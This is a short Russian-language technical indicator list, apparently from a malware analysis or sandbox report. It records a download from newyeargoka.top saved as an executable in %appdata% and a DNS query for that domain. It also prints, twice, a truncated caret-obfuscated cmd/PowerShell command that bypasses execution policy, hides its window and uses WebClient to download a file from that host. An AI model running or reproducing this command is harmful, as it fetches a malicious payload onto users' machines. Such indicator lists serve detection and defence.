Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoW^ErshELL^.^eXe -EX^E^CuT^IonPolICy B^YpASS -Nop^Ro^FIlE^ -wIn^DoWStYLe hiDDe^N ^(NEW-OBjEct SY^stEm^.Net^.WE^BClIEN^t)^.d^oWNLoAdFiLe^('http://newyeargoka.top/read.php?f=...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "PoW^ErshELL^.^eXe -EX^E^CuT^IonPolICy B^YpASS -Nop^Ro^FIlE^ -wIn^DoWStYLe hiDDe^N ^(NEW-OBjEct SY^stEm^.Net^.WE^BClIEN^t)^.d^oWNLoAdFiLe^('http://newyeargoka.top/read.php?f=...' (со скрытым окном)